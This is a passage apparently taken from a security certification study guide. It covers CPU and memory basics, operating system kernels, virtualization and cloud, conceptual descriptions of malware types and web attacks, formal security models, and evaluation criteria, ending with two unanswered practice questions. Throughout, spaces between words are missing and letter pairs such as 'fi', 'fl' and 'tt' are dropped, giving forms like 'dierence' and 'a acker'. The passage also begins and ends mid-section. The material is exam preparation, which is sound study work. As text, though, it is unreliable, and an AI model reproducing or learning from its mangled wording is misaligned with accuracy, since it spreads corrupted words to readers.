5.Fetchinstruction5,decodeinstruction4,executeinstruction3,write(save)
result2,etc.
Pipeliningislikeanautomobileassemblyline:insteadofbuildingonecarata
time,fromstarttonish,lotsofcarsentertheassemblypipeline,anddiscrete
phases(likeinstallingthetires)occurononecarafteranother.Thisincreases
thethroughput.
Interrupts

Aninterruptindicatesthatanasynchronouseventhasoccurred.CPU
interruptsareaformofhardwareinterruptthatcausetheCPUtostop
processingitscurrenttask,savethestate,andbeginprocessinganew
request.Whenthenewtaskiscomplete,theCPUwillcompletethepriortask.
Processes and threads

Aprocessisanexecutableprogramanditsassociateddataloadedand
runninginmemory.Aheavyweightprocess(HWP)isalsocalledatask.A
parentprocessmayspawnadditionalchildprocessescalledthreads.Athread
isalightweightprocess(LWP).Threadsareabletosharememory,resulting
inloweroverheadcomparedtoheavyweightprocesses.
Multitasking and multiprocessing

Applicationsrunasprocessesinmemory,comprisedofexecutablecodeand
data.Multitaskingallowsmultipletasks(heavyweightprocesses)torun
simultaneouslyononeCPU.Olderandsimpleroperatingsystems,suchas
MSDOS,arenonmultitasking:theyrunoneprocessatatime.Mostmodern
operatingsystems,suchasLinuxandWindowsXP,supportmultitasking.

E x a m Wa r n i n g
Somesourcesrefertoothertermsrelatedtomultitasking,including
multiprogrammingandmultithreading.Multiprogrammingismultiple
programsrunningsimultaneouslyononeCPU;multitaskingismultiple
tasks(processes)runningsimultaneouslyononeCPU,and
multithreadingismultiplethreads(lightweightprocesses)running

simultaneouslyononeCPU.
Multiprogrammingisanolderformofmultitasking;manysourcesuse
thetwotermssynonymously.Thisbookwillusethetermmultitasking
torefertomultiplesimultaneousprocessesononeCPU.

Multiprocessinghasafundamentaldierencefrommultitasking:itruns
multipleprocessesonmultipleCPUs.Twotypesofmultiprocessingare
SymmetricMultiprocessing(SMP)andAsymmetricMultiprocessing(AMP,
somesourcesuseASMP).SMPsystemshaveoneoperatingsystemtomanage
allCPUs.AMPsystemshaveoneoperatingsystemimageperCPU,
essentiallyactingasindependentsystems.
CISC and RISC

CISC(ComplexInstructionSetComputer)andRISC(ReducedInstructionSet
Computer)aretwoformsofCPUdesign.CISCusesalargesetofcomplex
machinelanguageinstructions,whileRISCusesareducedsetofsimpler
instructions.x86CPUs(amongmanyothers)areCISC;ARM(usedinmany
cellphonesandPDAs),PowerPC,SPARC,andothersareRISC.
Memory

Memoryisaseriesofonoswitchesrepresentingbits:0s(o)and1s(on).
Memorymaybechipbasedanddiskbasedoruseothermediasuchastape.
RAMisRandomAccessMemory:randommeanstheCPUmayrandomly
access(jumpto)anylocationinmemory.Sequentialmemory(suchastape)
mustsequentiallyreadmemory,beginningatosetzerotothedesired
portionofmemory.Volatilememory(suchasRAM)losesintegrityaftera
powerloss;nonvolatilememory(suchasROM,disk,ortape)maintains
integritywithoutpower.
Real(orprimary)memory,suchasRAM,isdirectlyaccessiblebytheCPU
andisusedtoholdinstructionsanddataforcurrentlyexecutingprocesses.
Secondarymemory,suchasdiskbasedmemory,isnotdirectlyaccessible.
Cache memory

Cachememoryisthefastestmemoryonthesystem,requiredtokeepupwith

theCPUasitfetchesandexecutesinstructions.Thedatamostfrequently
usedbytheCPUisstoredincachememory.ThefastestportionoftheCPU
cacheistheregisterle,whichcontainsmultipleregisters.Registersaresmall
storagelocationsusedbytheCPUtostoreinstructionsanddata.
ThenextfastestformofcachememoryisLevel1cache,locatedontheCPU
itself.Finally,Level2cacheisconnectedto(butoutside)theCPU.SRAM
(StaticRandomAccessMemory)isusedforcachememory.
RAM and ROM

RAMisvolatilememoryusedtoholdinstructionsanddataofcurrently
runningprograms.Itlosesintegrityafterlossofpower.RAMmemory
modulesareinstalledintoslotsonthecomputermotherboard.
ROM(ReadOnlyMemory)isnonvolatile:datastoredinROMmaintains
integrityafterlossofpower.AcomputerBasicInputOutputSystem(BIOS)
rmwareisstoredinROM.WhileROMisreadonly,sometypesofROM
maybewri entoviaashing,aswewillseeshortlyinSectionFlash
memory.
DRAM and SRAM

StaticRandomAccessMemory(SRAM)isexpensiveandfastmemorythat
usessmalllatchescalledipopstostorebits.DynamicRandomAccess
Memory(DRAM)storesbitsinsmallcapacitors(likesmallba eries)andis
slowerandcheaperthanSRAM.ThecapacitorsusedbyDRAMleakcharge
andmustbecontinuallyrefreshedtomaintainintegrity,typicallyeveryfew
tofewhundredmilliseconds,dependingonthetypeofDRAM.Refreshing
readsandwritesthebitsbacktomemory.SRAMdoesnotrequirerefreshing
andmaintainsintegrityaslongaspowerissupplied.
Memory protection

Memoryprotectionpreventsoneprocessfromaectingthecondentiality,
integrity,oravailabilityofanother.Thisisarequirementforsecuremultiuser
(morethanoneuserloggedinsimultaneously)andmultitasking(morethan
oneprocessrunningsimultaneously)systems.
Process isolation

Processisolationisalogicalcontrolthata emptstopreventoneprocessfrom

interferingwithanother.Thisisacommonfeatureamongmultiuser
operatingsystemssuchasLinux,UNIX,orrecentMicrosoftWindows
operatingsystems.OlderoperatingsystemssuchasMSDOSprovideno
processisolation.AlackofprocessisolationmeansacrashinanyMSDOS
applicationcouldcrashtheentiresystem.
Hardware segmentation

Hardwaresegmentationtakesprocessisolationonestepfurtherbymapping
processestospecicmemorylocations.Thisprovidesmoresecuritythan
(logical)processisolationalone.
Virtual memory

Virtualmemoryprovidesvirtualaddressmappingbetweenapplicationsand
hardwarememory.Virtualmemoryprovidesmanyfunctions,including
multitasking(multipletasksexecutingatonceononeCPU),allowing
multipleprocessestoaccessthesamesharedlibraryinmemory,swapping,
andothers.
Swapping and paging

Swappingusesvirtualmemorytocopycontentsinprimarymemory(RAM)to
orfromsecondarymemory(notdirectlyaddressablebytheCPU,ondisk).
Swapspaceisoftenadedicateddiskpartitionthatisusedtoextendthe
amountofavailablememory.Ifthekernela emptstoaccessapage(axed
lengthblockofmemory)storedinswapspace,apagefaultoccurs(anerror
thatmeansthepageisnotlocatedinRAM),andthepageisswappedfrom
disktoRAM.
Firmware

Firmwarestoressmallprogramsthatdonotchangefrequently,suchasa
computersBIOS(discussedbelow)oraroutersoperatingsystemandsaved
conguration.VarioustypesofROMchipsmaystorermware,including
PROM,EPROM,andEEPROM.
PROM(ProgrammableReadOnlyMemory)canbewri entoonce,typically
atthefactory.EPROM(ErasableProgrammableReadOnlyMemory)and
EEPROM(ElectricallyErasableProgrammableReadOnlyMemory)maybe
ashed,orerasedandwri entomultipletimes.
AProgrammableLogicDevice(PLD)isaeldprogrammabledevice,which

meansitisprogrammedafteritleavesthefactory.EPROMs,EEPROMS,and
ashmemoryareexamplesofPLDs.
Flash memory

Flashmemory(suchasUSBthumbdrives)isaspecictypeofEEPROMused
forsmallportablediskdrives.ThedierenceisanybyteofanEEPROMmay
bewri en,whileashdrivesarewri enby(larger)sectors.Thismakesash
memoryfasterthanEEPROMs,butstillslowerthanmagneticdisks.
BIOS

TheIBMPCcompatibleBasicInputOutputSystemcontainscodeinrmware
thatisexecutedwhenaPCispoweredon.ItrstrunsthePowerOnSelfTest
(POST),whichperformsbasictests,includingverifyingtheintegrityofthe
BIOSitself,testingthememory,andidentifyingsystemdevices,amongother
tasks.OncethePOSTprocessiscompleteandsuccessful,itlocatestheboot
sector(forsystemsthatbootodisks),whichcontainsthemachinecodefor
theoperatingsystemkernel.Thekernelthenloadsandexecutes,andthe
operatingsystembootsup.

SECURE OPERATING SYSTEM AND SOFTWARE ARCHITECTURE

Secureoperatingsystemandsoftwarearchitecturebuildsuponthesecure
hardwaredescribedintheprevioussection,providingasecureinterface
betweenhardwareandtheapplications(andusers)thataccessthehardware.
Operatingsystemsprovidememory,resource,andprocessmanagement.
The kernel

Thekernelistheheartoftheoperatingsystem,whichusuallyrunsinring0.
Itprovidestheinterfacebetweenhardwareandtherestoftheoperating
system,includingapplications.WhenanIBMcompatiblePCisstartedor
rebooted,theBIOSlocatesthebootsectorofastoragedevicesuchasahard
drive.Thatbootsectorcontainsthebeginningofthesoftwarekernelmachine
code,whichisthenexecuted.Kernelshavetwobasicdesigns:monolithicand
microkernel.
Amonolithickerneliscompiledintoonestaticexecutableandtheentire
kernelrunsinsupervisormode.Microkernelsaremodularkernels.A
microkernelisusuallysmallerandhaslessnativefunctionalitythanatypical
monolithickernel,butcanaddfunctionalityvialoadablekernelmodules.
Reference monitor

Reference monitor

Acorefunctionofthekernelisrunningthereferencemonitor,whichmediates
allaccessbetweensubjectsandobjects.Itenforcesthesystemssecurity
policy,suchaspreventinganormaluserfromwritingtoarestrictedle,such
asthesystempasswordle.
Virtualization

Virtualizationaddsasoftwarelayerbetweenanoperatingsystemandthe
underlyingcomputerhardware.Thisallowsmultipleguestoperating
systemstorunsimultaneouslyononephysicalhostcomputer.
Hypervisor

Thekeytovirtualizationsecurityisthehypervisor,whichcontrolsaccess
betweenvirtualguestsandhosthardware.Atype1hypervisor(alsocalled
baremetal)ispartofanoperatingsystemthatrunsdirectlyonhost
hardware.Atype2hypervisorrunsasanapplicationonanormaloperating
system,suchasWindows7.
Manyvirtualizationexploitstargetthehypervisor,includinghypervisor
controlledresourcessharedbetweenhostandguests,orguestandguest.
Theseincludecutandpaste,shareddrives,andsharednetworkconnections.
Virtualization security issues

Virtualizationsoftwareiscomplexandrelativelynew.Asdiscussed
previously,complexityistheenemyofsecurity:thesheercomplexityof
virtualizationsoftwaremaycausesecurityproblems.
Combiningmultipleguestsontoonehostmayalsoraisesecurityissues.
Virtualizationisnoreplacementforarewall:nevercombineguestswith
dierentsecurityrequirements(suchasDMZandinternal)ontoonehost.
Theriskofvirtualizationescape(calledVMEscape,whereana acker
exploitsthehostOSoraguestfromanotherguest)isatopicofrecent
research.Knownvirtualizationescapebugshavebeenpatched,butnew
issuesmayarise.
Manytraditionalnetworkbasedsecuritytools,suchasnetworkintrusion
detectionsystemsandrewalls,canbeblindedbyvirtualization.
Cloud computing

PubliccloudcomputingoutsourcesITinfrastructure,storage,orapplications
toathirdpartyprovider.Acloudalsoimpliesgeographicdiversityof
computerresources.Thegoalofcloudcomputingistoallowlargeproviders
toleveragetheireconomiesofscaletoprovidecomputingresourcestoother
companiesthattypicallypayfortheseservicesbasedontheirusage.
Threecommonlyavailablelevelsofserviceprovidedbycloudprovidersare
InfrastructureasaService(IaaS),PlatformasaService(PaaS),andSoftwareasa
Service(SaaS).InfrastructureasaServiceprovidesanentirevirtualized
operatingsystem,whichthecustomerconguresfromtheOSonup.
PlatformasaServiceprovidesapreconguredservice,suchasaWebserver
supportingPHP,withapreconguredbackenddatabase.Finally,Software
asaServiceiscompletelycongured,fromtheoperatingsystemto
applications,andthecustomersimplyusestheapplication.Inallthreecases,
thecloudprovidermanageshardware,virtualizationsoftware,network,
backups,etc.SeeTable6.1fortypicalexamplesofeach.
Table6.1
ExampleCloudServiceLevels

Type

Example

InfrastructureasaService(IaaS) Linuxserverhosting
PlatformasaService(PaaS)

Webservicehosting

SoftwareasaService(SaaS)

Webmail

Privatecloudshousedataforasingleorganizationandmaybeoperatedbya
thirdpartyorbytheorganizationitself.Governmentcloudsaredesignedto
keepdataandresourcesgeographicallycontainedwithinthebordersofone
country,designedforthegovernmentoftherespectivecountry.
Benetsofcloudcomputingincludereducedupfrontcapitalexpenditure,
reducedmaintenancecosts,robustlevelsofservice,andoveralloperational
costsavings.

Fromasecurityperspective,takingadvantageofpubliccloudcomputing
servicesrequiresstrictservicelevelagreementsandanunderstandingofnew
sourcesofrisk.Oneconcernismultipleorganizationsguestsrunningonthe
samehost.Thecompromiseofonecloudcustomercouldleadtocompromise
ofothercustomers.
Organizationsshouldalsonegotiatespecicrightsbeforesigningacontract
withacloudcomputingprovider.Theserightsincludetherighttoaudit,the
righttoconductavulnerabilityassessment,andtherighttoconducta
penetrationtest(bothelectronicandphysical)ofdataandsystemsplacedin
thecloud.
Grid computing

Gridcomputingrepresentsadistributedcomputingapproachthata empts
toachievehighcomputationalperformancebyanontraditionalmeans.
Ratherthanachievinghighperformancecomputationalneedsbyhaving
largeclustersofsimilarcomputingresourcesorasinglehighperformance
system,suchasasupercomputer,gridcomputinga emptstoharnessthe
computationalresourcesofalargenumberofdissimilardevices.
Peer-to-peer

Peertopeer(P2P)networksaltertheclassicclient/servercomputermodel.
Anysystemmayactasaclient,aserver,orboth,dependingonthedata
needs.Decentralizedpeertopeernetworksareresilient:therearenocentral
serversthatcanbetakenoine.
Thin clients

Thinclientsaresimplerthannormalcomputersystems,withharddrives,full
operatingsystems,locallyinstalledapplications,etc.Theyrelyoncentral
servers,whichserveapplicationsandstoretheassociateddata.Thinclients
allowcentralizationofapplicationsandtheirdata,aswellastheassociated
securitycostsofupgrades,patching,datastorage,etc.Thinclientsmaybe
hardwarebased(suchasdisklessworkstations)orsoftwarebased(suchas
thinclientapplications).

SYSTEM VULNERABILITIES, THREATS, AND COUNTERMEASURES

Systemthreats,vulnerabilities,andcountermeasuresdescribeSecurity
ArchitectureandDesignvulnerabilities,andthecorrespondingexploitsthat

maycompromisesystemsecurity.Wewillalsodiscusscountermeasuresor
mitigatingactionsthatreducetheassociatedrisk.
Covert channels

Acovertchannelisanycommunicationthatviolatessecuritypolicy.Two
specictypesofcovertchannelsarestoragechannelsandtimingchannels.A
storagechannelexampleusessharedstorage,suchasatemporarydirectory,
toallowtwosubjectstosignaleachother.Acoverttimingchannelrelieson
thesystemclocktoinfersensitiveinformation.
Bu er overflows

Bueroverowscanoccurwhenaprogrammerfailstoperformbounds
checking.Bytesbeyondtheallocatedspacewilloverwritememoryintended
tostoredierentdata.
TOCTOU/race conditions

TimeofCheck/TimeofUse(TOCTOU)a acksarealsocalledraceconditions:an
a ackera emptstoalteraconditionafterithasbeencheckedbythe
operatingsystem,butbeforeitisused.
Maintenance Hooks

MaintenanceHooksareatypeofbackdoor;theyareshortcutsinstalledby
systemdesignersandprogrammerstoallowdeveloperstobypassnormal
systemchecksduringdevelopment,suchasrequiringuserstoauthenticate.
Malicious code (malware)

Maliciouscodeormalwareisthegenerictermforanytypeofsoftwarethat
a acksanapplicationorsystem.Therearemanytypesofmaliciouscode;
viruses,worms,Trojans,andlogicbombscancausedamagetotargeted
systems.
Zerodayexploitsaremaliciouscode(athreat)forwhichthereisnovendor
suppliedpatch(meaningthereisanunpatchedvulnerability).
Computer viruses

Computervirusesaremalwarethatdoesnotspreadautomatically:they
requireacarrier(usuallyahuman).

FastFacts
Typesofvirusesinclude:
Macrovirus:viruswri eninmacrolanguage(suchasMicrosoftOce
orMicrosoftExcelmacros)
Bootsectorvirus:virusthatinfectsthebootsectorofaPC,which
ensuresthatthevirusloadsuponsystemstartup
Polymorphicvirus:avirusthatchangesitscodeuponinfectionofanew
system,a emptingtoevadesignaturebasedantivirussoftware
Multipartitevirus:avirusthatspreadsviamultiplevectors.Alsocalled
multipartvirus.

Worms

Wormsaremalwarethatselfpropagates(spreadsindependently).Worms
typicallycausedamagetwoways:rstbythemaliciouscodetheycarry;the
secondtypeofdamageislossofnetworkavailabilityduetoaggressiveself
propagation.
Trojans

ATrojan(alsocalledaTrojanhorse)ismalwarethatperformstwofunctions:
onebenign(suchasagame)andonemalicious.Thetermderivesfromthe
TrojanhorsedescribedinVirgilspoemTheAeneid.
Rootkits

Arootkitismalwarethatreplacesportionsofthekerneland/oroperating
system.Ausermoderootkitoperatesinring3onmostsystems,replacing
operatingsystemcomponentsinuserland.
Akernelmoderootkitreplacesthekernelorloadsmaliciousloadablekernel
modules.Kernelmoderootkitsoperateinring0onmostoperatingsystems.
Web architecture and attacks

TheWorldWideWebof10yearsagowasasimplerWeb:mostWebpages

werestatic,renderedinHTML.TheadventofWeb2.0,withdynamic
content,multimedia,andusercreateddata,hasincreasedthea acksurface
oftheWeb:creatingmorea ackvectors.
Applets

Appletsaresmallpiecesofmobilecodethatareembeddedinothersoftware
suchasWebbrowsers.UnlikeHTML(HyperTextMarkupLanguage),which
providesawaytodisplaycontent,appletsareexecutables.Theprimary
securityconcernisthatappletsaredownloadedfromserversandthenrun
locally.Maliciousappletsmaybeabletocompromisethesecurityofthe
client.
Appletscanbewri eninavarietyofprogramminglanguages;two
prominentappletlanguagesareJava(byOracle/SunMicrosystems)and
ActiveX(byMicrosoft).ThetermappletisusedforJava,andcontrolfor
ActiveX,thoughtheyarefunctionallysimilar.
Java

Javaisanobjectorientedlanguageusednotonlytowriteappletsbutalsoasa
generalpurposeprogramminglanguage.Javabytecodeisplatform
independent:itisinterpretedbytheJavavirtualmachine(JVM).
Javaappletsruninasandbox,whichsegregatesthecodefromtheoperating
system.Thesandboxisdesignedtopreventana ackerwhoisableto
compromiseajavaappletfromaccessingsystemles,suchasthepassword
le.
ActiveX

ActiveXcontrolsarethefunctionalequivalentofJavaapplets.Theyuse
digitalcerticatesinsteadofasandboxtoprovidesecurity.UnlikeJava,
ActiveXisaMicrosofttechnologythatworksonMicrosoftWindows
operatingsystemsonly.
OWASP

TheOpenWebApplicationSecurityProject(OWASP;see
h p://www.owasp.org)representsoneofthebestapplicationsecurity
resources.OWASPprovidesatremendousnumberoffreeresources
dedicatedtoimprovingorganizationsapplicationsecurityposture.Oneof
theirbestknownprojectsistheOWASPTop10project,whichprovides

consensusguidanceonwhatareconsideredtobethetenmostsignicant
applicationsecurityrisks.TheOWASPTop10isavailableat
h ps://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project.
Inadditiontothewealthofinformationaboutapplicationsecuritythreats,
vulnerabilities,anddefenses,OWASPalsomaintainsanumberofsecurity
toolsavailableforfreedownloadincludingtwoleadinginterceptionproxies:
WebScarabandZAP,theZedA ackProxy.
XML and SAML

XML(ExtensibleMarkupLanguage)isamarkuplanguagedesignedasa
standardwaytoencodedocumentsanddata.XMLissimilarto,butmore
universalthan,HTML.XMLisusedontheWeb,butisnottiedtoit:XMLcan
beusedtostoreapplicationconguration,outputfromauditingtools,and
manyotheruses.ExtensiblemeansusersmayuseXMLtodenetheirown
dataformats.
SecurityAssertionMarkupLanguage(SAML)isanXMLbasedframeworkfor
exchangingsecurityinformation,includingauthenticationdata.Onegoalof
SAMListoenableWebsinglesignon(SSO)atanInternetscale.
Service-Oriented Architecture

ServiceOrientedArchitecture(SOA)a emptstoreduceapplication
architecturedowntoafunctionalunitofaservice.SOAisintendedtoallow
multipleheterogeneousapplicationstobeconsumersofservices.Theservice
canbeusedandreusedthroughoutanorganizationratherthanbuiltwithin
eachindividualapplicationthatneedsthefunctionalityoeredbytheservice.
Servicesareexpectedtobeplatformindependentandabletobecalledina
genericwaynotdependentuponaparticularprogramminglanguage.The
intentisthatthatanyapplicationmayleveragetheservicesimplybyusing
standardmeansavailablewithintheirprogramminglanguageofchoice.
Servicesaretypicallypublishedinsomeformofadirectorythatprovides
detailsabouthowtheservicecanbeusedandwhattheserviceprovides.
ThoughWebservicesarenottheonlyexample,theyarethemostcommon
exampleprovidedfortheSOAmodel.XMLorJSON(JavaScriptObject
Notation)iscommonlyusedfortheunderlyingdatastructuresofWeb
services,SOAP(originallyanacronymforSimpleObjectAccessProtocol,

butnowsimplySOAP)orREST(RepresentationalStateTransfer)provides
theconnectivity,andtheWSDL(WebServicesDescriptionLanguage)
providesdetailsabouthowtheWebservicesaretobeinvoked.
Mobile device attacks

ArecentinformationsecuritychallengeismobiledevicesrangingfromUSB
ashdrivestolaptopsthatareinfectedwithmalwareoutsideofasecurity
perimeterandthencarriedintoanorganization.Traditionalnetworkbased
protection,suchasrewallsandintrusiondetectionsystems,ispowerlessto
preventtheinitiala ack.
Mobile device defenses

Defensesincludepolicyadministrativecontrolssuchasrestrictingtheuseof
mobiledevicesviapolicy.Technicalcontrolstomitigateinfectedmobile
computersincluderequiringauthenticationatOSImodellayer2via802.1X.
802.1Xauthenticationmaybebundledwithadditionalsecurityfunctionality,
suchasvericationofcurrentpatchesandantivirussignatures.
Anothermobiledevicesecurityconcernisthelossortheftofamobiledevice,
whichthreatenscondentiality,integrity,andavailabilityofthedeviceand
thedatathatresidesonit.Backupscanassuretheavailabilityandintegrityof
mobiledata.
Fulldiskencryption(alsoknownaswholediskencryption)shouldbeusedto
ensurethecondentialityofmobiledevicedata.
Remotewipecapabilityisanothercriticalcontrol,whichdescribestheability
toerase(andsometimesdisable)amobiledevicethatislostorstolen.
Database security

Databasespresentuniquesecuritychallenges.Thesheeramountofdatathat
maybehousedinadatabaserequiresspecialsecurityconsideration.The
logicalconnectionsdatabaseusersmaymakebycreating,viewing,and
comparingrecordsmayleadtoinferenceandaggregationa acks,requiring
databasesecurityprecautionssuchasinferencecontrolsandpolyinstantiation.
Polyinstantiation

Polyinstantiationallowstwodierentobjectstohavethesamename.The
nameisbasedontheLatinrootsformultiple(poly)andinstances

(instantiation).Databasepolyinstantiationmeanstworowsmayhavethe
sameprimarykey,butdierentdata.
Inference and aggregation

Inferenceandaggregationoccurwhenauserisabletouselowerlevelaccessto
learnrestrictedinformation.Theseissuesoccurinmultiplerealms,including
databasesecurity.
Inferencerequiresdeduction:thereisamysterytobesolved,andlowerlevel
detailsprovidetheclues.Aggregationisamathematicalprocess:auserasks
everyquestion,receiveseveryanswer,andderivesrestrictedinformation.

SECURITY MODELS
Nowthatweunderstandthelogical,hardware,andsoftwarecomponents
requiredtohavesecuresystems,andtheriskposedtothosesystemsby
vulnerabilitiesandthreats,securitymodelsproviderulesforsecurely
operatingthosesystems.
Bell-LaPadula model

TheBellLaPadulamodelwasoriginallydevelopedfortheU.S.Departmentof
Defense.Itisfocusedonmaintainingthecondentialityofobjects.Protecting
condentialitymeansnotallowingusersatalowersecurityleveltoaccess
objectsatahighersecuritylevel.

FastFacts
BellLaPadulaincludesthefollowingrulesandproperties:
SimpleSecurityProperty:noreadup:asubjectataspecic
classicationlevelcannotreadanobjectatahigherclassicationlevel.
SubjectswithaSecretclearancecannotaccessTopSecretobjects,for
example.
SecurityProperty:nowritedown:asubjectatahigherclassication
levelcannotwritetoalowerclassicationlevel.Forexample,subjectswho
areloggedintoaTopSecretsystemcannotsendemailstoaSecretsystem.

StrongTranquilityProperty:securitylabelswillnotchangewhilethe
systemisoperating.
WeakTranquilityProperty:securitylabelswillnotchangeinawaythat
conictswithdenedsecurityproperties.

Lattice-based access controls

La icebasedaccesscontrolallowssecuritycontrolsforcomplexenvironments.
Foreveryrelationshipbetweenasubjectandanobject,therearedened
upperandloweraccesslimitsimplementedbythesystem.Thisla ice,which
allowsreachinghigherandlowerdataclassication,dependsontheneedof
thesubject,thelabeloftheobject,andtherolethesubjecthasbeenassigned.
SubjectshaveaLeastUpperBound(LUB)andGreatestLowerBound(GLB)
ofaccesstotheobjectsbasedontheirla iceposition.
Integrity models

ModelssuchasBellLaPadulafocusoncondentiality,sometimesatthe
expenseofintegrity.TheBellLaPadulanowritedownrulemeanssubjects
canwriteup:aSecretsubjectcanwritetoaTopSecretobject.Whatifthe
SecretsubjectwriteserroneousinformationtoaTopSecretobject?Integrity
modelssuchasBibaaddressthisissue.
Biba model

Whilemanygovernmentsareprimarilyconcernedwithcondentiality,most
businessesdesiretoensurethattheintegrityoftheinformationisprotectedat
thehighestlevel.Bibaisthemodelofchoicewhenintegrityprotectionisvital.

FastFacts
TheBibamodelhastwoprimaryrules:theSimpleIntegrityAxiomand
the*IntegrityAxiom:
SimpleIntegrityAxiom:noreaddown:asubjectataspecic
classicationlevelcannotreaddataatalowerclassication.Thisprevents
subjectsfromaccessinginformationatalowerintegritylevel.Thisprotects

integritybypreventingbadinformationfrommovingupfromlower
integritylevels.
*IntegrityAxiom:nowriteup:asubjectataspecicclassication
levelcannotwritedatatoahigherclassication.Thispreventssubjects
frompassinginformationuptoahigherintegritylevelthantheyhave
clearancetochange.Thisprotectsintegritybypreventingbadinformation
frommovinguptohigherintegritylevels.

Bibaisoftenusedwhereintegrityismoreimportantthancondentiality.
Examplesincludetimeandlocationbasedinformation.

D i d Yo u K n o w ?
BibatakestheBellLaPadularulesandreversesthem,showinghow
condentialityandintegrityareoftenatodds.IfyouunderstandBell
LaPadula(noreadup;nowritedown),youcanextrapolateBibaby
reversingtherules:noreaddown;nowriteup.

Clark-Wilson

ClarkWilsonisarealworldintegritymodelthatprotectsintegrityby
requiringsubjectstoaccessobjectsviaprograms.Becausetheprogramshave
speciclimitationstowhattheycanandcannotdotoobjects,ClarkWilson
eectivelylimitsthecapabilitiesofthesubject.ClarkWilsonusestwo
primaryconceptstoensurethatsecuritypolicyisenforced:wellformed
transactionsandseparationofduties.Theconceptofwellformed
transactionsprovidesintegrity.Theprocessiscomprisedoftheaccess
controltriple:user,transformationprocedure,andconstraineddataitem.
Chinese Wall model

TheChineseWallmodel(alsoknownasBrewerNash)isdesignedtoavoid
conictsofinterestbyprohibitingoneperson,suchasaconsultant,from
accessingmultipleconictofinterestcategories(CoIs).
Access control matrix

Access control matrix

Anaccesscontrolmatrixisatabledeningwhataccesspermissionsexist
betweenspecicsubjectsandobjects.Amatrixisadatastructurethatactsas
atablelookupfortheoperatingsystem.Therowsofthetableshowthe
capabilitiesofeachsubject;eachrowiscalledacapabilitylist.Thecolumnsof
thetableshowtheACLforeachobjectorapplication.

EVALUATION METHODS, CERTIFICATION, AND ACCREDITATION

Evaluationmethodsandcriteriaaredesignedtogaugetherealworld
securityofsystemsandproducts.TheTrustedComputerSystemEvaluation
Criteria(TCSEC,akatheOrangeBook)isthegranddaddyofevaluation
models,developedbytheU.S.DepartmentofDefenseinthe1980s.Other
internationalmodelshavefollowed,includingITSECandtheCommon
Criteria.
The Orange Book

TheNationalComputerSecurityCenter(NCSC),partoftheNational
InstituteofStandardsandTechnology(NIST),withhelpfromtheNational
SecurityAgency(NSA)developedtheTrustedComputerSystemEvaluation
Criteria(TCSEC),whichisalsoknownastheOrangeBook.Itwasoneofthe
rstsecuritystandardsimplementedandmajorportionsofthosestandards
arestillusedtodayintheformofU.S.GovernmentProtectionProleswithin
theInternationalCommonCriteriaframework.

FastFacts
ThedivisionsofTCSEC:
D:Minimalprotection.ThisdivisiondescribesTCSECevaluated
systemsthatdonotmeettherequirementsofhigherdivisions(Cthrough
A).
C:Discretionaryprotection.Discretionarymeansdiscretionaryaccess
controlsystems(DAC).
B:Mandatoryprotection.Mandatorymeansmandatoryaccesscontrol
systems(MAC).

A:Veriedprotection.IncludesallrequirementsofB,plusadditional
controls.

ITSEC

TheEuropeanInformationTechnologySecurityEvaluationCriteria(ITSEC)was
therstsuccessfulinternationalevaluationmodel.ItreferstoTCSECOrange
Booklevels,separatingfunctionality(F,howwellasystemworks)from
assurance(theabilitytoevaluatethesecurityofasystem).Therearetwo
typesofassurance:eectiveness(Q)andcorrectness(E).

AssurancecorrectnessratingsrangefromE0(inadequate)toE6(formal
modelofsecuritypolicy);functionalityratingsrangeincludeTCSEC
equivalentratings(FC1,FC2,etc.).

FastFacts
TheequivalentITSEC/TCSECratingsare
E0:D
FC1,E1:C1
FC2,E2:C2
FB1,E3:B1
FB2,E4:B2
FB3,E5:B3
FB3,E6:A1

The International Common Criteria

TheInternationalCommonCriteriaisaninternationallyagreeduponstandard

fordescribingandtestingthesecurityofITproducts.Itpresentsahierarchy
ofrequirementsforarangeofclassicationsandsystems.

CrunchTime
TheCommonCriteriausesspecictermswhendeningspecicportions
ofthetestingprocess:
TargetofEvaluation(ToE):thesystemorproductthatisbeingevaluated
SecurityTarget(ST):thedocumentationdescribingtheTOE,including
thesecurityrequirementsandoperationalenvironment
ProtectionProle(PP):anindependentsetofsecurityrequirementsand
objectivesforaspeciccategoryofproductsorsystems,suchasrewalls
orintrusiondetectionsystems
EvaluationAssuranceLevel(EAL):theevaluationscoreofthetested
productorsystem

Levels of evaluation

WithintheCommonCriteria,therearesevenEALs,eachbuildinguponthe
previouslevel.Forexample,EAL3ratedproductscanbeexpectedtomeetor
exceedtherequirementsofproductsratedEAL1orEAL2.

FastFacts
Thecommoncriterialevelsare:
EAL1:Functionallytested
EAL2:Structurallytested
EAL3:Methodicallytestedandchecked

EAL4:Methodicallydesigned,tested,andreviewed
EAL5:Semiformallydesignedandtested
EAL6:Semiformallyveried,designed,andtested
EAL7:Formallyveried,designed,andtested
2

TheCommonCriteriaforInformationSecurityTechnology.

h p://www.commoncriteriaportal.org/les/ccles/CCPART1V3.1R3.pdf
[accessedJune26,2013].

PCI-DSS

ThePaymentCardIndustryDataSecurityStandard(PCIDSS)isasecurity
standardcreatedbythePaymentCardIndustrySecurityStandardsCouncil
(PCISSC).ThecounciliscomprisedofAmericanExpress,Discover,Master
Card,Visa,andothers.PCIDSSseekstoprotectcreditcardsbyrequiring
vendorsusingthemtotakespecicsecurityprecautions.
Certification and Accreditation

Certicationmeansasystemhasbeencertiedtomeetthesecurity
requirementsofthedataowner.Certicationconsidersthesystem,the
securitymeasurestakentoprotectthesystem,andtheresidualrisk
representedbythesystem.Accreditationisthedataownersacceptanceofthe
Certication,andoftheresidualrisk,requiredbeforethesystemisputinto
production.

Summary of exam objectives

TheSecurityArchitectureandDesigndiscussedthefundamentalbuilding
blocksofsecurecomputersystems,includingconceptsincludingthering
model,layer,andabstraction.Wediscussedsecurehardware,includingthe
CPU,computerbus,RAM,andROM.Securesoftwareincludesthekernel,
referencemonitor,andoperatingsystem.Weuseallofthesetogethertobuild
asecurecomputersystem.

Oncebuilt,welearnedwaystosecurelyoperatethesystem,includingmodes
suchastheBellLaPadulacondentialitymodelandtheBibaintegritymodel,
aswellasmodesofoperationincludingdedicated,systemhigh,
compartmented,andmultilevelsecure.Finally,welearnedofwaysto
determineassurance:proofthatoursystemsreallyaresecure.Evaluation
modelsrangedfromTCSEC,toITSEC,totheCommonCriteria,andbeyond.

TOP FIVE TOUGHEST QUESTIONS

1.WhattypeofmemoryisusedoftenforCPUregisters?
A.DRAM
B.Firmware
C.ROM
D.SRAM
2.WhichtypeofcloudservicelevelwouldLinuxhostingbeoeredunder?
A.LaaS
B.SaaS
C.IaaS
D.PaaS
